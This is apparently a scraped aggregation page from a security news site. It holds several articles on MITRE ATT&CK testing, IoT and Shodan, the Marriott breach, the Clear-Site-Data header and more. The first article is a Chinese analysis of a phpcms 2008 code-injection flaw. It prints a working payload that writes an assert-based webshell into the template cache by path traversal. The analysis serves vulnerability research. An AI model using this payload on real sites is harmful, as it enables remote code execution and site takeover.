Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

phpcms 2008 type.php 前台代码注入getshell漏洞分析

$
0
0

phpcms 2008 type.php 前台代码注入getshell漏洞分析

tpye.php中:

<?php require dirname(__FILE__).'/include/common.inc.php'; ... if(empty($template)) $template = 'type'; ... include template('phpcms', $template); ... ?>

先看一下 require 进来的 include/common.inc.php ,在这个文件第58行中存在如下代码:

if($_REQUEST) { if(MAGIC_QUOTES_GPC) { $_REQUEST = new_stripslashes($_REQUEST); if($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE); extract($db->escape($_REQUEST), EXTR_SKIP); } else { $_POST = $db->escape($_POST); $_GET = $db->escape($_GET); $_COOKIE = $db->escape($_COOKIE); @extract($_POST,EXTR_SKIP); @extract($_GET,EXTR_SKIP); @extract($_COOKIE,EXTR_SKIP); } if(!defined('IN_ADMIN')) $_REQUEST = filter_xss($_REQUEST, ALLOWED_HTMLTAGS); if($_COOKIE) $db->escape($_COOKIE); }

上面这段代码会通过 @extract() 将尚未注册的变量进行注册,如果有冲突,不覆盖已有的变量。因此通过这个伪全局可以绕过 if(empty($template)) $template = 'type'; 这句话的指定,即 $template 变量可控。

跟入 template 函数,定义在 include/global.func.php:772

function template($module ='phpcms', $template ='index', $istag =0) { $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php'; if(TPL_REFRESH && (!file_exists($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html') > @filemtime($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/tag.inc.php') > @filemtime($compiledtplfile))) { require_once PHPCMS_ROOT.'include/template.func.php'; template_compile($module, $template, $istag); } return $compiledtplfile; }

这里会进行一些判断, TPL_REFRESH 表示是否开启模板缓存自动刷新,默认为1, 剩下的用于判断缓存超时。倘若需要更新缓存则进入了 template_compile() 函数,根据上一句的 require_once 可知定义在 include/template.func.php:2

<?php function template_compile($module, $template, $istag =0) { $tplfile = TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html'; $content = @file_get_contents($tplfile); if($content === false) showmessage("$tplfile is not exists!"); $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php'; $content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content); $strlen = file_put_contents($compiledtplfile, $content); @chmod($compiledtplfile, 0777); return $strlen; }

重点看 $content = ($istag || substr($template, 0, 4) == 'tag_') 这一句。由于 $template 可控,只要 $template 以 tag_ 开头,就可以使得此处的三元表达式进入到第一个分支中,即相当于:

$content = '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' 由于 $template 未经过滤,被直接拼接到内容中,所以如果指定 tag_(){};@unlink(_FILE_);assert($_GET[1]);{//../rss ,则拼接后的结果为 $content = '<?php function _tag_phpcms_tag_(){};@unlink(_FILE_);assert($_GET[1]);{//../rss($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>'

可以看到一句话木马已经写入了 $content ,之后 file_put_contents($compiledtplfile, $content); 将内容写入文件。

回到前面的 template_compile 函数中, TPL_CACHEPATH 为常量 PHPCMS_ROOT.'data/cache_template/ ; 可知 $compiledtplfile 为:

$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';

即:

$compiledtplfile = 'data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_GET[1]);{//../rss.tpl.php';

所以payload末尾的 ../ 利用目录穿越使得最后的 $compiledtplfile 为 'data/cache_template/rss.tpl.php


phpcms 2008 type.php 前台代码注入getshell漏洞分析

为了解析不出错,payload末尾处的 // 注释了拼接后的其余部分,如上图。

此后访问 http://127.0.0.1/phpcms/data/cache_template/rss.tpl.php?1=phpinfo( )


phpcms 2008 type.php 前台代码注入getshell漏洞分析

Putting the MITRE ATT&CK Evaluation into Context

$
0
0

Today, MITRE published the results of their first public EDR product evaluation. This effort was a collaboration between MITRE and seven EDR vendors to understand how various products can be used to provide security teams with visibility into post-compromise adversary techniques. In the test, MITRE executed a set of techniques using open source methods mirroring previously-observed APT3 techniques. In their write-up, they’ve supplied information about how vendors provided alerting and/or visibility into data associated with their execution of a technique.

This is an extremely valuable contribution to the infosec community. Frank, Katie, Blake, Chris and others at MITRE should be applauded for all the hours and energy they poured into generating this groundbreaking body of knowledge. The testing was well organized, the data captured thorough, and the finalization of results fair and collaborative. That last point is especially noteworthy given the huge amount of nuance and inherent lack of any one universal “right way” to address much of ATT&CK. This evaluation is a great achievement from MITRE, and we look forward to working with MITRE on continually refining the process and participating in future tests.

As we reflect on the test and what it means, we would like to add some perspective to put the results into context.

Why the MITRE ATT&CK evaluation is valuable and important

Product testing is not new. Endgame is a participant in public testing and an active member of the Anti-Malware Standards Testing Organization (AMTSO). Transparency and openness are foundational Endgame operating principles. Not being afraid of competitive testing and evaluation is a necessary part of that, despite every independant test having different imperfections. We welcome it.

What is new about this test is that it entirely emphasizes post-compromise visibility. Depending on which way you look at it, that’s either intentionally ignored or a complete or near-complete blind spot for public evaluations until now. This matters. Why?

The community has become increasingly aware that it’s not all about exploit and malware blocking. Adversaries can perform operations using nothing but credentials and native binaries. Whether from a vendor or a result of home-grown detection engineering, none of our detections or protections are immune to bypass, no matter anyone’s claims. Organizations need to assume they’re breached and build security programs which allow for the discovery of active attackers in the environment.

MITRE ATT&CK is by far the best, most authoritative knowledge base of techniques to consider in building a detection program which includes the “assume breach” concept. All organizations require tooling to give them data and detection capabilities, whether they build their own or, as most do, work with one or more vendors to provide data gathering, querying capabilities, alerting, and other components.

The ATT&CK product evaluation provides a good reference dataset highlighting various methods of detection. It starts to move towards a taxonomy describing types of detection and visibility - the taxonomy MITRE has given us is complex and perhaps imperfect, but that’s reflective of the problem as a whole. It’s not a simple yes/no answer or a numeric score, like typical tests which measure whether a piece of malware was blocked or not. Most importantly, the evaluation moves us forward in emphasizing the fundamental importance of data visibility when it comes to building a program and considering tooling.

The MITRE evaluation isn’t everything

The evaluation provides a massive amount of data and people will naturally wonder how to action that information. As we’ve described before (and we’re not the only ones), ATT&CK is not a measuring stick. It’s a knowledge base. Trying to use it as a universal, quantitative measurement device is a recipe for failure.

We could probably spend entire posts delving into each of these items, and this list isn’t comprehensive, but some of the pitfalls and challenges inherent to trying to quantify ATT&CK include:

Not considering real world scenarios. In the real world, you don’t need to detect or block every component of an attack to disrupt an adversary or remediate an action. We build layered behavioral preventions and detections for our customers. These layers, working together, provide a vanishing probability of missing a real attack, even if we know it’s likely we won’t alert on every action taken in an attack. We know individual protections will sometimes miss or be bypassed. Similarly, incident responders will tell you that it’s a pipe dream if you ever imagine you will have a completely airtight picture of every technique used by an adversary in a known breach. 100% visibility is not necessary for effective remediation. Lack of prioritization or weighting of techniques. Is deep, signatureless coverage of process injection more important than knowing that an attacker base64 encoded something on an already compromised box? For any enterprise team I can conceive of, yes, injection coverage is dramatically more important. There’s no notion of prioritization between techniques in ATT&CK. Seethis post we did last year for a deeper dive into ways technique coverage could be prioritized by teams according to their particular threat landscape and interests. MITRE hasn’t included prioritizations for a reason: it is not a weighted measurement tool, it’s a knowledge base. Turning it into a score sheet can be counterproductive. ATT&CK is incomplete. MITRE does a great job updating ATT&CK as new techniques become known. This regularly happens due to white hat security research, adversary evolution, and new threat reporting. ATT&CK is by definition always behind the cutting-edge in the real world, and it has gaps. Level of specificity in a given technique also varies widely. We are excited about future decomposition of techniques into sub-techniques, as there are usually a number of known methods to invoke a single technique. In this particular evaluation, you’ll note some cases where MITRE chose a few different ways to implement a single technique. This is good and reflective of reality. But, there are huge number of untested alternative implementations even for the techniques used in this evaluation. Testing everything would be nearly impossible. Noise in production. Is an alert better than telemetry? Sometimes yes, sometimes no. The majority of the activity described in ATT&CK is seen in most enterprises on a daily basis. We cannot seek alerting coverage across all of ATT&CK. It would overwhelm security teams with noise and FPs. Taking that idea further, we shouldn’t even overextend in an attempt to provide visibility to every cell - there are diminishing returns in the real-world in doing so. Data robustness. Not all data is created equal in terms of enrichments and hardening against adversaries determined to get around your EDR solution. There’s a growing body of research around this topic, for example this excellent talk by William Burgess called “Red Teaming in the EDR Age.” We highly recommend it and similar work to anyone considering visibility. Many common sources of EDR data can be undermined by an attacker with access. At Endgame, we put a lot of effort into hardening our datasources. Not all EDR vendors do the same. This is an important factor but one which would not be easy to measure in an evaluation. Evaluating the tool or the Team? For a nuanced evaluation such as this, some amount of expertise and knowledge is required. In the MITRE evaluation, vendors were invited to deploy, configure, and participate in the evaluation on the blue team side. This makes tremendous sense, as MITRE had enough work to do beyond overcoming the often steep learning curve of the various EDR products. Endgame takes great pride in how our customers can consume and make use of advanced capabilities compared with the deep expertise and expertise required for other tools in this space. Assessing usability and accounting for a security team’s expertise would be very hard in an evaluation. Not a full product assessment. Visibility is one important component of any endpoint security tool. Other important components include prevention, hardening (discussed above), response, usability, and a host of considerations around topics like deployment, endpoint impact, network impact, and more.

None of this is intended as a criticism of MITRE’s evaluation. In fact, they’ve taken care not to overstate what the test is by providing information about evaluated products that is narrowly scoped around post-compromise visibility. They haven’t attempted to score or rank vendor products, and neither should we.

Even teams new to ATT&CK should be working to incorporate it into their security program. There is a lot to consider, but there are ways to get started by taking small bites out of the huge ATT&CK sandwich. We’ve recently written about this topic, with some of that information availablehere.

What about Endgame’s evaluation?

We are pleased with how the evaluation describes our capabilities. Our agent provides visibility into the vast majority of techniques tested by MITRE in the evaluation, using a good balance of alerting behavioral detections and straightforward visibility into activity via our telemetry. Some of the noteworthy items in the results include:

ATT&CK Integration. The results showcase our product’s long standing ATT&CK integration where behavioral detections are linked to ATT&CK. Access to Telemetry. MITRE’s results detail our interactive process tree, Endgame Resolver. Telemetry is easily visible from this tree. It’s not readily apparent from static screenshots, but the entire tree is interactive and response actions can be taken right from the tree. Enrichments. Custom enrichments are shown for ATT&CK-relevant items that didn’t make sense for alerting. For example, execution of ipconfig doesn’t create alerts on its own, but if it is related to processes with higher confidence alerting, the potential security relevancy of that ipconfig execution is highlighted for the user. Memory Introspection. In-memory artifact capture is also showcased in the evaluation, with artifacts such as strings present in injected threads automatically captured for inspection. Everyone Has Gaps and Differences. Some visibility gaps exist, and for most of those, we already have robust solutions in flight. For example, our customers will be excited to see enhanced network data capture in our next monthly release. In this ATT&CK evaluation, none of these gaps are news to us and we have some disagreement reflected in the Notes about whether some are actually gaps versus differences in evaluator expectations and workflow. That said, we look forward to continual assessment and relentless improvement. What’s next?

We’re proud to have participated in this evaluation and look forward to participating again, should MITRE continue to lead evaluations. We look forward to continued collaboration with MITRE on ways to design and run both this evaluation and other competitive testing through our participation in AMTSO. And, we’ll continue to contribute to the community’s overall understanding of how to build a security program, including how to operationalize ATT&CK. And, of course, we’ll keep building and enhancing the Endgame platform for our current and future customers.

OpenShift Commons Briefing: Container Deployment and Security Best Practices Joh ...

$
0
0
OpenShift Commons Briefing Summary

In this briefing, Twistlock’s John Morello and Red Hat’s Dirk Herrmann gave an in-depth look at the recent NIST Special Publication SP800-190 on Container Security and why it matters if you are deploying containers. They covered best practices for achieving the SP800-190 recommendations on OpenShift.

Access the slides from this briefing: Container Deployment and Security Best Practices NIST 800 190 Briefing

Link to the NIST Special Publication 800-190 Application Container Security Guide

Join the Community at the Upcoming OpenShift Commons Gathering in Seattle! Dec 10th @ Kubecon

We’re also excited to announce that the upcoming OpenShift Commons Gathering will be taking place December 10, 2018 in Seattle, co-located once again with CNCF’s KubeCon & CloudNativeCon. The OpenShift Commons Gathering brings together experts from all over the world to discuss real-world implementations of container technologies, best practices for cloud native application developers and the upstream open source software projects that make up the OpenShift ecosystem.

Confirmed Keynotes and Speakers from Red Hat already include:

AMA Panel with OpenShift Product Managers and Engineering leads Chris Wright on Emerging Technology and Innovation Reza Shafii on Red Hat’s Unified Hybrid Cloud Clayton Coleman & Mike Barrett on OpenShift 3.x: Features/Functions/Future Diane Mueller on Cross-Community Collaboration with Upstream Sebastian Pahl on Operator Framework

More speakers and panelists are being added, check out the agenda for updates . Please note: Pre-registration is required. To register, add the OpenShift Commons Gathering as a co-located event during your KubeCon + CloudNativeCon registration.

Blue Helix’s BHEX Exchange Raises $15 Million to Reshape Crypto Trading Securit ...

$
0
0

A decentralised platform aimed at providing a custody and clearing product for crypto assets has seen its BHEX Exchange raise $15 million in funding.

The new funding for Blue Helix came from the likes of Huobi Global, OKCoin, Genesis Capital, Node Capital, City Holdings, and Yintai Investment, to name a few. According to an announcement, the money raised will go toward delivering a new level of security to the crypto trading industry via the next-generation digital asset trading platform.

BHEX will officially launch at the end of November.

Demand for BHEX’s investment subscription has attracted over 70 investment opportunities, 40 of which Blue Helix selected to take part in its first round of Token Fund strategic investment.

James Ju, founder and CEO of BHEX said: “Bluehelix technology will be an open source project after it has been completely developed, it will be supported by decentralised cryptographic algorithms, blockchain technology, and the innovative Bluehelix technology.”

The announcement goes on to say that Blue Helix is committed to providing a decentralised platform and states it has simplified one-off asset exchangesby executing an automatic trade upon price match.

Not only that, but it’s also aiming to reshape the security and credibility issues of centralised crypto trading platforms. The platform notes this is achieved by permitting centralised exchanges to enjoy the benefits of decentralised exchanges while solving the key holder problem and placing the power back into the user’s hands.

Through itsBHPOS consensus mechanism, asset custody and clearing is managed and supervised by the the whole community. This includes storing transactions onto blockchains, cold and hot wallet segmentations, multi-layer signatures, and community asset clearing consensus mechanisms.

According to Blue Helix, this will enable the distribution management and supervision of asset custody while enabling peer-to-peer settlements. Crypto custody services are an important facet of the ecosystem as can be seen from the likes of Coinbase’s institutional-gradecustody serviceor asset manager Fidelity Investments own crypto custody service for Bitcoin and Ethereum.

The Likelihood of a Cyber Attack Compared

$
0
0

While the cost of acyber attack is often discussed, we seldom hear about just how common these attacks actually are. Numerous security experts believe that a cyber attack or breach of catastrophic proportions is no longer a matter of if, but a matter of when.

According to the World Economic Forum’s 2018 Global Risks Report , the top three risks to global stability over the next five years are natural disasters, extreme weather and cyber attacks. When it comes to preparing for the physical risks, we are quick to board up our windows and evacuate to safer locations.

Why is it that we don’t take the same precautions when it comes to protecting ourselves from cyber attacks ― despite the fact that it’s one of the top three safety risks we face?

One likely reason that people don’t take the precaution of protecting their IT systems is that many believe an attack is one of those things that just won’t happen to them. So, we decided to take a look at the likelihood of other “won’t happen to me” events, to paint a clear picture of just how common a cyber breach really is.


The Likelihood of a Cyber Attack Compared

If the chances of a breach at 1 in 4 weren’t enough to make you think twice about your cyber security, here’s a few more stats to help put things in perspective:

There is an estimated cyber attack every 39 seconds Since 2013, there have been 3.8 million records stolen every single day The average cost of a data breach is estimated to exceed $150 million by 2020

While it can be easy to write off a cyber attack as one of those things that will never happen to you, they are one of the top three risks we face in modern day society. With 230,000 new malware samples appearing every day, being proactive with your cybersecurity is more critical now than ever.

Uncover where your biggest security risks lie with adata risk assessment ― Varonis is here to help protect you from becoming another cyber attack statistic.

Sources:

Insider | Tech Republic | Fix | Security Intelligence | Weather | Nationsearch | CNBC | National Park Service | The Balance | Forbes

IoT Security in the Shodan Age

$
0
0
Introduction

The landscape of IoT has been changed completely since the appearance of Shodan, a search engine that lets users find Internet-connected devices such as traffic lights, webcams, routers, security cameras and more. Shodan crawls the Internet, looking for publicly-accessible devices in the IoT ― many of which have minimal security. It’s been online for almost ten years.

Despite this fact, manufacturers have not been responsive to the potential threat posed by Shodan and services like it. It most likely will not be long until a massive global hack occurs that exposes millions, potentially billions, to devastating consequences.

This article will address how Shodan changed the landscape of IoT, why this problem is a manufacturer problem, and how security can evolve to tackle this problem. You should have a good grasp on the subject of IoT Security in the Shodan Age by the time you are done reading this article.

How Did Shodan Change the Landscape of IoT?

It is important to begin with the fact that Shodan was not the first tool hackers could use to attack IoT devices. This article will not be a doom-and-gloom, end-of-the-world vision of Shodan, because the basic fact is that IoT devices are hackable with or without it. Period.

However, Shodan has made it far easier to access IoT devices remotely, and in some cases shockingly so. Answering the bellyaching of big tech companies for the need to monitor their devices, Shodan was created in 2009. The immediate impact was that tech company employees, as well as pentesters, hackers and researchers, suddenly had the ability to monitor IoT devices such as webcams, security systems, garage doors and other IoT devices. Part of this was predicated on the fact that IoT devices often have weak default security protections. (But that will be discussed later.)

Dubbed “Google for hackers,” Shodan has been described as interesting, exciting and frightening.

Let’s say that you’re an information security professional with good knowledge of IoT but not familiar with Shodan. Where Shodan has not revolutionized the IoT landscape, it has changed the way that IoT devices are accessed, which should raise some serious security red flags for those working with IoT security.

The first and most shockingly-powerful function of Shodan is that it allows you to find the physical location of any Internet-connected device. You can search for devices by their IP addresses, find IP addresses of devices, find out what ports the devices are using and even what operating systems they are running on. Shodan also lets you search for a connected device’s default security credentials, the device’s domain or subnet, known vulnerabilities and even ports that are currently open. As you can see, Shodan has changed the field by allowing you to retrieve a substantial information profile on connected devices.

The biggest real-world change to the IoT landscape is the change in scale: No connected device is off-limits. Maybe twenty-five years ago or so, the ability to physically locate and access a connected device would not pose much of a security risk. This is in part because nothing much of true importance was connected to the Internet. Now things are quite different with Shodan, where paying a small monthly fee gives users the ability to search for connected devices to their heart’s content.

Why Is This a Manufacturer Problem?

The security problem that exists is between Shodan and Internet-connected devices rests solely in the laps of device manufacturers. This problem can also be fixed by manufacturers just as well.

The simple fact is that connected-device manufacturers have been falling off in the department of device security. Most commonly, connected devices come with weak passwords loaded as the default password or even with no passwords at all. This may seem like a small problem, but as time goes on, this problem will increase exponentially as more and more consumers stock their homes with connected devices.

Despite what device manufacturers may think, the average consumer is still pretty non-tech-savvy and may not have the technical awareness to manually check their device security configurations. In situations like these, devices with weak passwords will suffer from ineffectual security and those without passwords will continue to be insecure. Of course, as soon as the first major hack hits the IoT, major security overhauls may occur fairly quickly ― though the hope is to properly remedy the problem so that Zero Day never comes.

With this said, manufacturers are clearly in the best position to prevent this problem from occurring in the first place. A simple change to the default security configuration is all that is needed to stop this problem, and surely this would work for consumer-connected devices. However, ICS and critical infrastructure-controlled devices are another issue indeed.

How Can Security Evolve?

One of the most important things to take away from this article is the fact that this problem can be resolved relatively easily, compared to the looming threat of a coming massive hack of IoT. Below are recommendations for how security can evolve to meet this rising new challenge.

Connected Device Security Training

First, and most important, is IoT-connected device security training for individuals and those working in critical infrastructure. The funny thing is that although critical infrastructure employees have far more at stake in terms of configuring their connected devices properly, the training would more or less be the same.

The crux of the training should cover connected device security passwords and how to change the default security password. This simple change would even the security playing field and make the ability to access a connected device have a similar difficulty level as, say, hacking into a business server.

Changes to Authentication

Another way that security can evolve in a smart direction is by using multi-factor authentication with your IoT devices. It should come as no surprise that this recommendation comes after you are trained on your device security, because a solid security password is fundamental to the whole security process. There are different ways that you can implement multi-factor authentication, so make sure that you find one that suits your organization’s connected device schema.

Security Updates and Patches

Without a doubt, making sure your devices are up to date with the latest security updates and patches has been in the lexicon of just about every PC user since the 1990s. Common sense says that this old responsibility would naturally flow to IoT devices, and it should not be shocking that this is the case. IoT devices need to be updated fully with all the latest patches, because hackers exploit IoT devices that are lacking in the security updates and patch department.

HTTPS

Using HTTPS on IoT devices is another great way to deal with the advent of broad IoT search tools like Shodan. As things stand now, HTTPS is the language that is commonly used in the back end of IoT, such as in application and Web servers. This convenience, coupled with the inherent security, makes using HTTPS with your IoT devices a home-run move.

Conclusion

Shodan has been quite the moving force on the IoT landscape in the almost decade that it has been in existence. While it may have made it easier for hackers to access and attack devices, this fact should be used as a learning experience for those who use IoT devices. Simply tightening up your security passwords, and especially changing them from their abysmal default settings, will fix most of the security issues stemming from Shodan with a good amount of room for IoT security to evolve in response.

Sources What is Shodan? The search engine for everything on the Internet , CSO Dark Side of the IoT? Shodan Search Engine , RTInsights A Beginner’s Guide to Securing Your IoT Devices , IoT for All

Marriott hotel chain reveals data breach that affected 500 million customers

$
0
0

Facepalm:Another day, another data breach―and this one’s a biggie. Hotel chain Marriott has announced “a data security incident” that saw the details of around 500 million guests stolen from its reservation database.

In a statement, the company said that “unauthorized access” to the Starwood guest reservation database in the United States was detected on or before September 10. It found that the attacker(s) had been able to infiltrate the network since 2014.

327 million of the pilfered records include some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation dates, and communication preferences.

Worryingly, the chain says that some information also includes payment card numbers and payment card expiration dates. Although this data was encrypted, there are two components needed to decrypt the payment card numbers, and Marriott has not been able to rule out the possibility that both were taken.

Marriott is now working with law enforcement and has begun notifying regulatory authorities. It is informing customers of the breach, including those in the US, Canada, and the UK.

“We deeply regret this incident happened,” said Arne Sorenson, Marriott’s President and Chief Executive Officer. “We fell short of what our guests deserve and what we expect of ourselves. We are doing everything we can to support our guests, and using lessons learned to be better moving forward.”

At 500 million affected guests, the data breach is one of the 21st century’s biggest, placing it behind only the Yahoo hack that exposed three billion user accounts .

The exact nature of the Marriott breach has not been revealed, but Ilia Kolochenko, CEO and founder of web security company High-Tech Bridge , believes it was related to insecure web applications. “Many large companies still do not even have an up2date inventory of their external applications, let alone conducting continuous security monitoring and incremental testing. They try different security solutions without a consistent and coherent application security strategy. Obviously, one day such an approach will fail,” he said.

Image credit: Shutterstock

A new Security Header: Clear Site Data

$
0
0

I was debating whether or not to call Clear Site Data a Security Header but in the end I decided I would. During the use of a web app we can leave various pieces of data in the browser that we'd like to clear out if the user logs out or deletes their account. Clear Site Data gives us a reliable way to do that.

Storing Data

We potentially store all kinds of data on a user's device during the use of our site including cookies, cache, localStorage, sessionStorage, things like service worker registrations and much more. The Clear Site Data header gives us a reliable way to ensure that we delete any and all such data when we need or want to. Clearing cookies can be difficult unless you have an exhaustive list of all cookies that may be set and there's no reliable way at all to interact with the network cache in a browser either. Clear Site Data presents a reliable option to do all of this.

Clear Site Data

You can read the RFC for more details but I'm going to cover all of the basics here. If at any point you want to clear some data from the browser, say the users logs out or deletes their account, you return the Clear-Site-Data header and configure it to remove the data you'd like. There are currently 4 options on the type of data you can remove with the header, here are the snippets from the spec.

"cache" - The cache type indicates that the server wishes to remove locally cached data associated with the origin of a particular response’s url. This includes the network cache, of course, but will also remove data from various other caches which a user agent implements (prerendered pages, script caches, shader caches, etc.)

"cookies"- The cookies type indicates that the server wishes to remove cookies associated with the origin of a particular response’s url. Along with cookies, HTTP authentication credentials, and origin-bound tokens such as those defined by Channel ID and Token Binding are also cleared.

"storage"- The storage type indicates that the server wishes to remove locally stored data associated with the origin of a particular response’s url. This includes storage mechansims such as ( localStorage , sessionStorage , [INDEXEDDB], [WEBDATABASE], etc), as well as tangentially related mechainsm such as service worker registrations.

"executionContexts"- The executionContexts type indicates that the server wishes to neuter and reload execution contexts currently rendering the origin of a particular response’s url.

"*"- The * (wildcard) pseudotype indicates that the server has the same effect as specifying all types.

When you'd like to clear one, some or all of these types of data from the browser then you simply issue the header on the response and configure it appropriately.

Clear-Site-Data: "cache", "cookies", "storage", "executionContexts"

Implementing on Report URI

I figured we had a great use case to deploy this on Report URI and test it out because we have user accounts that require auth, a logout feature and an account deletion feature too.

When a user logs out of their account, or deletes it, we now send the CSD header to make sure we've nuked anything that we may have left behind in their browser.

$this->session->sess_destroy(); $this->output->set_header('Clear-Site-Data: "cache", "cookies", "storage", "executionContexts", "*"'); $this->output->set_header('Location: /login/'); $this->output->set_status_header('302');

To make sure we get all types of data I've specified all 4 of the current types and the wildcard which should cover us for future additions to the spec too. That is one thing to watch though, if you use the wildcard today it may delete more than you expect in the future, so do bear that in mind! Here is our header being delivered on the logout page on my local test environment and this should be deployed to the live site by the time I publish.


A new Security Header: Clear Site Data

Another thing to consider is protecting endpoints that deliver the CSD header against CSRF attacks. Hopefully things like your logout function already have CSRF protection but the combination of being logged out with CSD shouldn't really change too much, it's just something to think about. You can see above that our logout feature is a simple GET request but we do have a token in the path to detect and mititgate CSRF so make sure you do the same whether it's GET or POST.


多项网络安全行动获美国2018年政府创新奖

$
0
0

2018年11月1日,美国联邦政府公布了其2018年政府创新奖项,共有36个公共部门的创新项目荣获此奖项。

涉及网络安全领域的部分获奖成果如下:

(1)密苏里州国民警卫队网络团队(MOCNET)

为大幅减少软件开发时间并降低风险,同时保持现有应用程序的完整性,MOCNET研发了“响应操作收集工具包网络安全监控”(RockNSM)解决方案,将多个开源工具整合到一个平台,便于数据收集和事件响应。该技术极大地缩短了从受感染服务器收集信息所需的时间,由原来的2天缩短到了20分钟。除了能够阻止威胁外,该平台还能够识别流量模式,以便在流量异常时改进黑客行为预测并增强取证能力。

(2)小企业管理局(SBA)

在管理和预算办公室开始关注可信互联网连接(TIC)现代化时,SBA抓住了机会,找到了满足TIC要求的新解决方案,且不受标准架构的限制。SBA使用基于云的安全工具,这些工具是微软现有的基于云计算的操作系统MicrosoftAzure和Office 365许可协议的一部分。该解决方案为SBA所有内部或云端部署的IT资产提供了完整的视图,可以对它们进行监控和保护,从根本上改变了确保IT资产管理网络安全的方式。

(3)科罗拉多州

选举安全问题主要出现在前端漏洞上,如投票机、州级注册网站和在线虚假宣传活动等。对此,科罗拉多州率先部署了一种后端投票验证技术,可以在选举出现问题时及时提醒官员。科罗多拉州推出的开源软件ColoradoRLA可以随机抽取区域纸质选票并与其相应的数字投票进行对比,如果发现足够显著的差异会自动标记选票。任何人都可以免费下载ColoradoRLA并解构其代码,以验证选举结果。

(4)桑迪亚国家实验室

桑迪亚实验室的主要任务是确保国家的核武器安全,因而面临着极为现实的威胁。据统计,实验室网络每天都要经历约15亿次网络事件,包括错误的密码输入、网络钓鱼和恶意软件攻击等。因此,桑迪亚实验室开发了高保真自适应欺骗和仿真系统(HADES),为操作人员提供打击入侵行为的能力。虽然HADES搭建的欺骗环境与桑迪亚的主机系统和数据是相隔离开的,但研发人员将HADES打造成了极为逼真的网络,让攻击者在其中耗费更长的时间,从而允许操作员实时监控攻击者的行为,并开发适当的应对策略。

中国科学院成都文献情报中心

信息科技战略情报团队编译

声明:本文来自中科院信息科技战略情报,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

Marriott Hotel Data Breach: Ongoing Since 2014

$
0
0

Marriott said that a massive data breach of its guest reservation system has left up to 500 million guests’ data exposed and available for the taking. Worse, the attackers may have had access to the systems for at least four years before being discovered.

The hotel company said in a statement on its website that hackers gained access to the Starwood reservation database. Starwood, which includes hotels like St. Regis and Sheraton, was bought by Marriott in 2016.

The hackers gained unauthorized access to Starwoods’ network back in 2014. Marriott said it discovered the breach on Sept. 8.

“The company has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property,” the company said in its statement.

Marriott did not respond to a request for comment about how the database was accessed.

Marriott said that hackers stole data like name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences for 327 million of these guests.

For others, information stolen also includes payment card numbers and payment card expiration dates. The payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128), stressed the company.

“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken,” the company said. “For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information.”

Security experts, such as Daniel Cuthbert, global head of cyber security research at Banco Santander, were astounded that the hack has been ongoing for four years without discovery.

"Marriott, the world’s biggest hotel company, said the huge hack had been going on since 2014"

FOUR YEARS!

1312 Days!

There is so much in this, where do you begin? #Marriott

― Daniel Cuthbert (@dcuthbert) November 30, 2018

Marriott has also had minorsecurity issues in the past. Kevin Beaumont pointed back to past security incidents with Marriott wherein a remote access trojan located inside the company’s network had access to their Cyber Incident Response Team mailbox in 2017.

This is from 2017. Per @Marriott their breach started in 2014. In this screenshot a remote access trojan inside the Marriott has access to their Cyber Incident Response Team mailbox. https://t.co/swLW2jKKGB

― Kevin Beaumont (@GossiTheDog) November 30, 2018

Backlash

The incident has left infosec community members and hotel guests scratching their heads about how the hackers could have stayed undetected for four years.

“Four years of unauthorized access is an eternity for hackers, so members of the Starwood rewards program need to keep a close eye on their balances, as attackers will often try to steal and monetize rewards points,” said Ben Johnson, co-founder and CTO of Obsidian Security. “While the recognition of the breach and an apology are important steps forward, Marriott must upgrade its ability to detect compromises like this much faster, and should move swiftly to protect the rewards accounts and personal information of its loyal members.”

Brian Vecci, technical evangelist at Varonis, pointed to the breach as a “textbook” example of how hackers are becoming smarter about building persistence when they breach critical systems.

“Threat actors are smart and getting smarter so it’s hard to catch them in the act, but not only did Marriott fail to protect customer records, they failed to detect the leakage of this data since 2014,” he said. “This breach is a textbook example of attacker dwell time, and how once an attacker compromises an organization their goal is not typically to smash and grab, but to build persistence mechanisms and backdoors to stay in a network and continue to steal critical information year after year.”

Meanwhile, the New York Attorney General’s office declared it was opening an investigation into the Marriott data breach. “New Yorkers deserve to know that their personal information will be protected,” NY Attorney General Barbara Underwood said in a Tweet.

We’ve opened an investigation into the Marriott data breach. New Yorkers deserve to know that their personal information will be protected.

― NY AG Underwood (@NewYorkStateAG) November 30, 2018

Marriott said it will begin sending emails on a rolling basis starting today, November 30, 2018, to affected guests whose email addresses are in the Starwood guest reservation database.

Threatpost will be updating this breaking news story as it develops. Please check back for more.

神奇的数字“3”:一次翻转3个比特即可实现Rowhammer攻击

$
0
0

